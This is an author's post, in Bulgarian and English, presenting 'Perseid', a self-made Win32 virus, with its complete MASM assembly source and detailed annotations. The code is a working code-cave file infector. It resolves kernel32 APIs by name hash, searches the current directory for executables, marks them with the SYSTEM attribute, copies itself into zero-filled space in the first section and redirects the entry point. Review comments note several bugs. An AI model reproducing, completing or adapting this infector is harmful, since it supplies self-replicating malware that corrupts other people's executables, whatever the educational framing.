
Това е едно мое творение – вирус, който заразява всички файлове в директорията, но само при условие, че имат достатъчно свободно място в секцията с кода, за да запише себе си там :) Написах го само за 2-3 дена и го кръстих Perseid, защото точно в деня, когато го завърших, покрай Земята минаваше голям поток от падащи звезди... наречени Perseid :)
; BlindWolf / Hack 3D
;
;I made this virus for educational purposes only, and to learn something.
;Credits go to fAMINE; I learned many things from his sources.
;This is a simple Win32 code-cave infector. The main executable should have the SYSTEM
;attribute and a writable code section. It uses name hashes (called "CRC" in the comments) instead of
;API names and keeps the API addresses on the stack. It infects only one executable in the current
;directory per execution. The size of the virus is 460 bytes. I still haven't added a payload. It's not
;really optimized, but it works fine for educational purposes :) .
.686p
.mmx
.MODEL flat,stdcall
OPTION CASEMAP:NONE
Include windows.inc
include kernel32.inc
includelib kernel32.lib
assume fs:FLAT
.code
; ---------------------------------------------------------------------------
; Main body.  Everything from Beginning to TheEnd is the "body" that gets
; copied into a victim (WriteLoop copies exactly TheEnd - Beginning bytes).
; Flow, as visible below:
;   1. delta offset, then patch the immediate of the push at GoToOEP
;   2. locate kernel32 from the caller's return address (GetKernel)
;   3. resolve 7 kernel32 exports by name hash and keep the addresses on the stack
;   4. FindFirstFileA/FindNextFileA over *.exe, skipping SYSTEM and DIRECTORY entries
;   5. set SYSTEM on the chosen file (doubles as the "already infected" marker),
;      open it, create a PAGE_READWRITE mapping and map the whole file
;   6. scan the first section for a run of zero dwords long enough for the body,
;      copy the body there and repoint AddressOfEntryPoint at it
;   7. push the host's original entry point and ret (dropper build: ExitProcess)
; Apart from FindNextFileA's BOOL, no API return value is checked anywhere in
; this body, and FindClose, UnmapViewOfFile and CloseHandle are never called
; (no hash for them is pushed).
; ---------------------------------------------------------------------------
db 0FFh                         ; generation marker.  Lies just before Beginning and is
                                ; NOT inside the copied range, so BackToEP sees 0FFh only
                                ; in the original dropper build
Beginning label near            ; first byte of the copied body
FileName db "*.exe",0           ; search pattern for FindFirstFileA (6 bytes incl. NUL)
realstart:                      ; entry point of the dropper; infected hosts enter here too
                                ; (new EP = cave + 6, skipping FileName)
call getDelta                   ; delta trick: push the runtime address of getDelta
getDelta:
pop ebp
sub ebp,offset getDelta         ; ebp = runtime address - assembled address
;Entry Point
mov esi,dword ptr[EntryPoint+ebp]   ; host OEP (VA) stored at infection time; 0 in the dropper
mov dword ptr[GoToOEP+ebp+1],esi    ; patch the imm32 of "push" at GoToOEP (self-modifying
                                    ; code: the executing section must be writable)
pop esi                         ; take the caller's return address as the kernel32 probe.
                                ; It is never pushed back, so esp is shifted from here on
and esi,0FFFF0000h              ; round down to a 64K boundary before scanning for 'MZ'
call GetKernel                  ; esi = kernel32 image base, edi = its export directory
; Resolve the APIs.  Each iteration pops one hash, resolves it, and stores the
; address at [esp+24] -- the dword just above the remaining hashes.  When edx
; reaches 0 the seven hashes are gone and the addresses occupy the seven
; dwords at [esp],[esp+4],... in this order: FindFirstFileA, FindNextFileA,
; SetFileAttributesA, CreateFileA, CreateFileMappingA, MapViewOfFileA,
; FlushViewOfFile.  Those dwords were the caller's stack (the return address
; was popped above) and are simply overwritten.
; NOTE(review): GetApis states EAX = 0 as an input (its hash folds the full
; EAX), but nothing between realstart and the first call below zeroes EAX --
; confirm what EAX holds at the host entry point.
mov edx,7h                      ; number of APIs to resolve
push 0BD01EEDEh                 ; name hash for FlushViewOfFile (pushed first -> resolved last)
push 53F2D79Bh                  ; name hash for MapViewOfFileA
push 1EF99B0Dh                  ; name hash for CreateFileMappingA
push 02BD833FBh                 ; name hash for CreateFileA
push 0F2290C25h                 ; name hash for SetFileAttributesA
push 0A38B216Eh                 ; name hash for FindNextFileA
push 0903ebb2eh                 ; name hash for FindFirstFileA (top of stack -> resolved first)
GetOneMoreApi:
pop ebx                         ; ebx = next hash (GetApis input)
push edx                        ; preserve the counter across GetApis (it clobbers edx)
call GetApis                    ; ecx = resolved address; esi/edi preserved, eax = 0 on return
pop edx
mov dword ptr[esp+4*6],ecx      ; park the address just above the remaining hashes (see above)
dec edx
jnz GetOneMoreApi
;ESP-13C = WIN32_FIND_DATA
pop ecx                         ; ecx = FindFirstFileA; the other six addresses stay on the stack
sub esp,13Ch                    ; reserve the WIN32_FIND_DATA buffer at [esp]
                                ; NOTE(review): sizeof(WIN32_FIND_DATAA) is 140h, 4 bytes
                                ; more than reserved; the dword at [esp+13Ch] is the
                                ; FindNextFileA slot -- verify the tail of the struct
                                ; (end of cAlternateFileName) cannot corrupt it
push esp                        ; lpFindFileData
lea eax,[FileName+ebp]
push eax                        ; lpFileName = "*.exe"
call ecx                        ; FindFirstFileA; INVALID_HANDLE_VALUE is not checked
mov esi,eax                     ; esi = search handle (never closed: no FindClose)
test byte ptr[esp],(FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_DIRECTORY)   ; low byte of dwFileAttributes
jz Continue                     ; plain file -> candidate
FindOneMore:
mov edi,dword ptr[esp+13Ch]     ; edi = FindNextFileA (slot directly above the buffer)
subloop:
push esp                        ; lpFindFileData
push esi                        ; hFindFile
call edi                        ; FindNextFileA
test al,al
jz BackToEP                     ; no more entries: give up, run the host
test byte ptr[esp],(FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_DIRECTORY)
jnz subloop                     ; SYSTEM (= already infected / the dropper) or a directory: skip
Continue:
; A candidate is in the buffer.  Walk esp back up to pop the next two stored
; addresses, then re-reserve the buffer so the file name can be addressed.
add esp,13Ch
pop edi                         ; discard FindNextFileA
pop eax                         ; eax = SetFileAttributesA
sub esp,13Ch
lea ebx,[esp+2Ch]               ; meant to be cFileName (offset 2Ch of WIN32_FIND_DATA)
                                ; NOTE(review): esp is 8 bytes above the buffer base here
                                ; (two pops since the sub above), so this is base+34h,
                                ; not base+2Ch -- verify against a debugger
push FILE_ATTRIBUTE_SYSTEM      ; dwFileAttributes: marks the file so it is skipped next time
push ebx                        ; lpFileName
call eax                        ; SetFileAttributesA (return value ignored)
xor edi,edi                     ; edi = 0, used as the NULL/0 argument below
add esp,13Ch                    ; drop the buffer for good
pop eax                         ; eax = CreateFileA
push edi                        ; hTemplateFile = NULL
push FILE_ATTRIBUTE_NORMAL      ; dwFlagsAndAttributes
push OPEN_EXISTING              ; dwCreationDisposition
push edi                        ; lpSecurityAttributes = NULL
push edi                        ; dwShareMode = 0 (exclusive)
push GENERIC_ALL                ; dwDesiredAccess
push ebx                        ; lpFileName
call eax                        ; CreateFileA; INVALID_HANDLE_VALUE is not checked
pop ebx                         ; ebx = CreateFileMappingA
push edi                        ; lpName = NULL
push edi                        ; dwMaximumSizeLow = 0
push edi                        ; dwMaximumSizeHigh = 0 -> mapping covers the file size
push PAGE_READWRITE             ; flProtect
push edi                        ; lpAttributes = NULL
push eax                        ; hFile
call ebx                        ; CreateFileMappingA (NULL not checked)
pop edx                         ; edx = MapViewOfFileA
push edi                        ; dwNumberOfBytesToMap = 0 -> whole file
push edi                        ; dwFileOffsetLow
push edi                        ; dwFileOffsetHigh
push FILE_MAP_ALL_ACCESS        ; dwDesiredAccess
push eax                        ; hFileMappingObject
call edx                        ; MapViewOfFile (NULL not checked; a NULL faults at [eax+3Ch])
; From here: eax = PE header, edi = map base, ecx = run length, ebx = bytes scanned.
xor ecx,ecx
mov edi,eax                     ; edi = start of the mapped file (e_lfanew is at +3Ch)
add eax,dword ptr[eax+3Ch]      ; eax = "PE\0\0" signature (IMAGE_NT_HEADERS)
mov edx,dword ptr[eax+28h]      ; AddressOfEntryPoint (RVA)
add edx,dword ptr[eax+34h]      ; + ImageBase -> VA
mov [EntryPoint+ebp],edx        ; stored inside the body so the copy carries the host OEP
mov dword ptr[eax+11Ch],0E0000020h  ; first section header Characteristics (0F8h+24h):
                                    ; CODE|EXECUTE|READ|WRITE, so the patched EP may self-modify
xor ebx,ebx                     ; ebx = bytes consumed by failed runs
add edi,dword ptr[eax+54h]      ; + SizeOfHeaders.  Assumes the first section's raw data
                                ; starts right after the headers (PointerToRawData at
                                ; +10Ch is never consulted)
dec edi                         ; pre-decrement; the loop increments before every check
TryToWrite:
; Look for TheEnd-Beginning consecutive positions whose dword is zero.
; The pointer advances one byte per step but each test reads a dword.
inc edi
inc ecx
cmp ecx,TheEnd - Beginning      ; run long enough for the whole body?
je Write
cmp dword ptr[edi],0
je TryToWrite                   ; still zero: extend the run
add ebx,ecx                     ; non-zero dword: account the failed run
cmp ebx,dword ptr[eax+108h]     ; past SizeOfRawData of the first section? (signed compare)
jge Finish                      ; no cave: leave the host alone (it already carries SYSTEM)
xor ecx,ecx
jmp TryToWrite
Write:
sub edi,ecx                     ; edi = start of the run.  edi was bumped before each check,
                                ; so this is one byte before the first position tested
push edi                        ; save the destination pointer
;calculate the New EP
push eax                        ; save the PE header pointer
sub edi,dword ptr[eax+54h]      ; - SizeOfHeaders
and eax,0FFFFFF00h              ; PE header -> map base, valid only while e_lfanew < 100h
sub edi,eax                     ; edi = offset within the first section's raw data
add edi,6h                      ; skip FileName ("*.exe",0) so the EP lands on realstart
pop eax
add edi,dword ptr[eax+104h]     ; + VirtualAddress of the first section (0F8h+0Ch) -> RVA
                                ; (the original comment called this "virtual size")
mov dword ptr[eax+28h],edi      ; AddressOfEntryPoint = new EP
pop edi                         ; edi = destination in the cave
lea esi,[ebp+Beginning]         ; esi = source: the running body; ecx still = body size
WriteLoop:
lodsb
stosb
loopd WriteLoop                 ; copy TheEnd-Beginning bytes, one at a time
sub eax,0C3h                    ; lodsb left al = last byte copied, presumably the 0C3h
                                ; "ret" that ends GetApis; subtracting it leaves
                                ; eax = PE header & ~0FFh = map base (same e_lfanew
                                ; assumption as above) for FlushViewOfFile
pop ecx                         ; ecx = FlushViewOfFile
push 0                          ; dwNumberOfBytesToFlush = 0 -> to the end of the mapping
push eax                        ; lpBaseAddress
call ecx                        ; FlushViewOfFile; the view is never unmapped
Finish:
nop
BackToEP:
; esp is not restored on any path, so the OEP starts with a different esp
; depending on whether a file was found and whether it was written.
cmp byte ptr[Beginning-1+ebp],0FFh  ; 0FFh only in the dropper build (see db above)
je Droper
GoToOEP:
push 00001111                   ; imm32 placeholder (decimal 1111); overwritten at run
                                ; time with the host OEP by the store near realstart
ret                             ; "jump" to the host's original entry point
EntryPoint dd 00000000          ; host OEP (VA); filled in while infecting, copied with the body
GetKernel proc
; Locate kernel32.dll by walking down from an address inside it.
;   In:  esi = a 64K-aligned address assumed to lie inside kernel32 (the caller
;        derived it from the return address found on the stack at entry)
;   Out: esi = image base (address of the 'MZ' header)
;        edi = VA of the export directory (data directory[0] at PE+78h)
; Clobbers: flags.
; There is no lower bound on the scan: if no 'MZ' is found the walk continues
; into unmapped pages and faults.  Only the two header bytes are checked, so
; any other page that starts with 'MZ' would be accepted as well.
tryagain:
cmp word ptr[esi],'ZM'          ; 'MZ' read as a little-endian word
jnz tryitman
mov edi,dword ptr[esi+3Ch]      ; e_lfanew
mov edi,dword ptr[esi+edi+78h]  ; RVA of the export directory
add edi,esi                     ; -> VA
Ret
tryitman:
sub esi,1000h                   ; step back one page and retry
jmp tryagain
GetKernel EndP
GetApis proc
; Resolve one kernel32 export by hashing its name.
;   In:  esi = image base, edi = export directory VA (both from GetKernel)
;        ebx = target hash
;        eax must be 0: lodsb only writes al and the hash folds the whole eax
;   Out: ecx = VA of the export; eax = 0; esi, edi preserved
; Clobbers: ebx, edx, flags.
; Hash (what the header calls "CRC"): starting from h = 0, for each byte c of
; the name including the terminating NUL:  h += c ; h = rol(h, c & 31).
; The name walk reads only the first entry of AddressOfNames and then keeps
; reading past each NUL, i.e. it assumes the name strings are laid out back to
; back in the same order as the AddressOfNames array.  There is no miss path:
; if NumberOfNames is exhausted the code falls into "found" with the count at
; zero and returns whatever the slot at index NumberOfNames holds.  Forwarded
; exports are not handled.
push edi
push esi
mov ecx,[edi+18h]               ; NumberOfNames
mov edx,[edi+20h]               ; AddressOfNames (RVA)
add edx,esi                     ; -> VA
push ecx                        ; [esp+8]: names left to try
push esi                        ; [esp+4]: image base
push edi                        ; [esp]:   export directory
mov edi,esi
mov esi,[edx]                   ; RVA of the first name string
add esi,edi                     ; -> VA; esi now walks the name table
lol:
xor edi,edi                     ; h = 0 for the next name
loop1:
lodsb                           ; al = next byte (upper bytes of eax must already be 0)
mov ecx,eax
add edi,eax                     ; h += c
rol edi,cl                      ; h = rol(h, c)   (the CPU masks cl to 5 bits)
test eax,eax
jne loop1                       ; the NUL is folded in too (adds 0, rotates by 0)
cmp edi,ebx
je found
dec dword ptr[esp+08h]          ; one fewer name to try
jne lol
found:
pop ebx                         ; ebx = export directory
pop eax                         ; eax = image base
pop ecx                         ; ecx = names left = NumberOfNames - index
mov edx,[ebx+18h]               ; NumberOfNames
mov edi,[ebx+24h]               ; AddressOfNameOrdinals (RVA)
add edi,eax                     ; -> VA
sub edx,ecx                     ; edx = index of the matched name
shl edx,1                       ; word-sized ordinals
add edi,edx
movzx edx,word ptr[edi]         ; edx = unbiased ordinal
mov ebx,[ebx+1ch]               ; AddressOfFunctions (RVA)
add ebx,eax                     ; -> VA
shl edx,2                       ; dword-sized function RVAs
add ebx,edx
xor ecx,ecx
add ecx,[ebx]                   ; ecx = function RVA (equivalent to mov ecx,[ebx])
add ecx,eax                     ; -> VA
xor eax,eax                     ; leave eax = 0 for the next call
pop esi
pop edi
Rets                            ; NOTE(review): not a standard MASM mnemonic; presumably
                                ; "ret" (0C3h).  The main body's "sub eax,0C3h" relies on
                                ; this being the last byte before TheEnd -- confirm
GetApis EndP                    ; returns ecx = address of the requested export
TheEnd label near               ; end of the copied body (size = TheEnd - Beginning)
Droper:                         ; reached only when the byte before Beginning is 0FFh,
                                ; i.e. in the original dropper build, never in a host
push 0                          ; uExitCode
call ExitProcess                ; goes through this image's import table; the copied body
                                ; in a host never executes this path
end realstart